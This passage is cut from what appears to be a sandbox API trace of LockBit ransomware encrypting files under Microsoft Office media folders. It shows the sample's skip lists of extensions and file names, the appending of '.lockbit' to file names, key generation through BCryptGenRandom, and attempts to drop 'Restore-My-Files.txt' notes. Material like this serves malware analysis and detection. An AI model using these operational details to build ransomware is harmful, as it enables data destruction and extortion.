pbBuffer=0x3e3004c) returned 0x0 [0197.083] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0197.088] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0222019.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0222019.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0197.088] malloc (_Size=0xa2) returned 0x1fa2ed8 [0197.088] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0xc0000008 [0197.089] free (_Block=0x1fa2ed8) [0197.089] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0222019.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0197.089] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0197.089] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0197.089] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85d3e900, ftCreationTime.dwHighDateTime=0x1be7a37, ftLastAccessTime.dwLowDateTime=0xbd539100, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x85d3e900, ftLastWriteTime.dwHighDateTime=0x1be7a37, nFileSizeHigh=0x0, nFileSizeLow=0x7c6, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0222021.WMF", cAlternateFileName="")) returned 1 [0197.089] lstrcmpiW (lpString1=".", lpString2="J0222021.WMF") returned -1 [0197.089] lstrcmpiW (lpString1="..", lpString2="J0222021.WMF") returned -1 [0197.089] PathFindExtensionW (pszPath="J0222021.WMF") returned=".WMF" [0197.089] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0197.089] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0197.089] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0197.089] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0197.089] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0197.089] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0197.089] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0197.089] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0197.089] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0197.090] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0197.090] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0197.090] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0197.090] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0197.090] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0197.090] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0197.090] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0197.090] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0197.090] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0197.090] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0197.090] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0197.090] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0197.090] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0197.090] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0197.090] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0197.090] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0197.090] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0197.090] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0197.090] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0197.090] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0197.090] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0197.090] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0197.091] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0197.091] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0197.091] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0197.091] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0197.091] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0197.091] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0197.091] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0197.091] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0197.091] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0197.091] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0197.091] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0197.091] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0197.091] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0197.091] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0197.091] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0197.091] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0197.091] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0222021.WMF") returned 1 [0197.091] lstrcmpiW (lpString1="ntldr", lpString2="J0222021.WMF") returned 1 [0197.091] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0222021.WMF") returned 1 [0197.091] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0222021.WMF") returned -1 [0197.091] lstrcmpiW (lpString1="autorun.inf", lpString2="J0222021.WMF") returned -1 [0197.091] lstrcmpiW (lpString1="thumbs.db", lpString2="J0222021.WMF") returned 1 [0197.092] lstrcmpiW (lpString1="iconcache.db", lpString2="J0222021.WMF") returned -1 [0197.092] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0197.092] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0222021.WMF") returned=".WMF" [0197.092] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0197.092] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0197.092] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0197.092] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0197.092] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0197.092] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0197.092] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0197.092] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0197.092] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0197.092] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0197.092] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0197.092] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0197.092] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0197.092] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0197.092] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0197.092] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0197.092] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0197.092] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0197.092] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0197.092] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0197.093] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0197.093] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0197.093] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0197.093] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0197.093] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0197.093] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0197.093] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0197.093] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0197.093] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0222021.WMF.lockbit") returned 70 [0197.093] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0222021.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0222021.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0197.095] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0197.095] malloc (_Size=0x40068) returned 0x3df0008 [0197.095] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=1990) returned 1 [0197.095] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.096] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.096] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0197.096] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.096] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.097] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0197.097] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0197.099] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0222021.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0222021.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0197.099] malloc (_Size=0xa2) returned 0x1fa2ed8 [0197.099] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0x0 [0197.101] free (_Block=0x1fa2ed8) [0197.101] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0222021.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0197.101] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0197.101] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0197.101] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7b0a7e00, ftCreationTime.dwHighDateTime=0x1be860b, ftLastAccessTime.dwLowDateTime=0xbd55f260, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x7b0a7e00, ftLastWriteTime.dwHighDateTime=0x1be860b, nFileSizeHigh=0x0, nFileSizeLow=0xf5c, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0229385.WMF", cAlternateFileName="")) returned 1 [0197.101] lstrcmpiW (lpString1=".", lpString2="J0229385.WMF") returned -1 [0197.102] lstrcmpiW (lpString1="..", lpString2="J0229385.WMF") returned -1 [0197.102] PathFindExtensionW (pszPath="J0229385.WMF") returned=".WMF" [0197.102] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0197.102] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0197.102] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0197.102] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0197.102] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0197.102] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0197.102] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0197.102] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0197.102] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0197.102] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0197.102] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0197.102] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0197.102] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0197.102] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0197.102] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0197.102] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0197.102] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0197.102] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0197.102] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0197.102] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0197.102] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0197.102] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0197.103] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0197.103] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0197.103] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0197.103] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0197.103] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0197.103] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0197.103] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0197.103] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0197.103] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0197.103] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0197.103] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0197.103] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0197.103] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0197.103] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0197.103] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0197.103] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0197.103] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0197.103] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0197.103] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0197.103] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0197.103] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0197.103] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0197.103] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0197.103] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0197.104] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0197.104] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0229385.WMF") returned 1 [0197.104] lstrcmpiW (lpString1="ntldr", lpString2="J0229385.WMF") returned 1 [0197.104] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0229385.WMF") returned 1 [0197.104] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0229385.WMF") returned -1 [0197.104] lstrcmpiW (lpString1="autorun.inf", lpString2="J0229385.WMF") returned -1 [0197.104] lstrcmpiW (lpString1="thumbs.db", lpString2="J0229385.WMF") returned 1 [0197.104] lstrcmpiW (lpString1="iconcache.db", lpString2="J0229385.WMF") returned -1 [0197.104] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0197.104] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0229385.WMF") returned=".WMF" [0197.104] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0197.104] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0197.104] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0197.104] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0197.104] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0197.104] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0197.104] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0197.104] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0197.104] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0197.104] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0197.104] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0197.104] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0197.104] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0197.104] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0197.104] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0197.104] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0197.105] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0197.105] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0197.105] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0197.105] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0197.105] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0197.105] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0197.105] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0197.105] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0197.105] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0197.105] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0197.105] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0197.105] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0197.105] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0229385.WMF.lockbit") returned 70 [0197.105] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0229385.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0229385.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x330 [0197.109] CreateIoCompletionPort (FileHandle=0x330, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0197.110] malloc (_Size=0x40068) returned 0x1ff1e60 [0197.110] GetFileSizeEx (in: hFile=0x330, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=3932) returned 1 [0197.110] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.110] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.110] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0197.110] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.111] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.111] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0197.111] ReadFile (in: hFile=0x330, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0197.113] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0229385.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0229385.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0197.113] malloc (_Size=0xa2) returned 0x1fa2ed8 [0197.113] NtSetInformationFile (FileHandle=0x330, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0x0 [0197.115] free (_Block=0x1fa2ed8) [0197.115] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0229385.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0197.115] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0197.115] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0197.115] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c3bab00, ftCreationTime.dwHighDateTime=0x1be860b, ftLastAccessTime.dwLowDateTime=0xbd55f260, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x7c3bab00, ftLastWriteTime.dwHighDateTime=0x1be860b, nFileSizeHigh=0x0, nFileSizeLow=0xee0, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0229389.WMF", cAlternateFileName="")) returned 1 [0197.115] lstrcmpiW (lpString1=".", lpString2="J0229389.WMF") returned -1 [0197.115] lstrcmpiW (lpString1="..", lpString2="J0229389.WMF") returned -1 [0197.115] PathFindExtensionW (pszPath="J0229389.WMF") returned=".WMF" [0197.115] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0197.115] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0197.115] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0197.115] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0197.115] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0197.115] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0197.115] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0197.115] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0197.115] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0197.116] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0197.116] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0197.116] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0197.116] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0197.116] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0197.116] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0197.116] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0197.116] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0197.116] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0197.116] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0197.116] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0197.116] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0197.116] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0197.116] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0197.116] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0197.116] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0197.116] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0197.116] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0197.116] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0197.116] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0197.116] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0197.116] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0197.116] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0197.116] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0197.117] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0197.117] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0197.117] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0197.117] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0197.117] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0197.117] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0197.117] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0197.117] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0197.117] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0197.117] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0197.117] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0197.117] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0197.117] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0197.117] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0197.117] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0229389.WMF") returned 1 [0197.117] lstrcmpiW (lpString1="ntldr", lpString2="J0229389.WMF") returned 1 [0197.117] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0229389.WMF") returned 1 [0197.117] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0229389.WMF") returned -1 [0197.117] lstrcmpiW (lpString1="autorun.inf", lpString2="J0229389.WMF") returned -1 [0197.117] lstrcmpiW (lpString1="thumbs.db", lpString2="J0229389.WMF") returned 1 [0197.117] 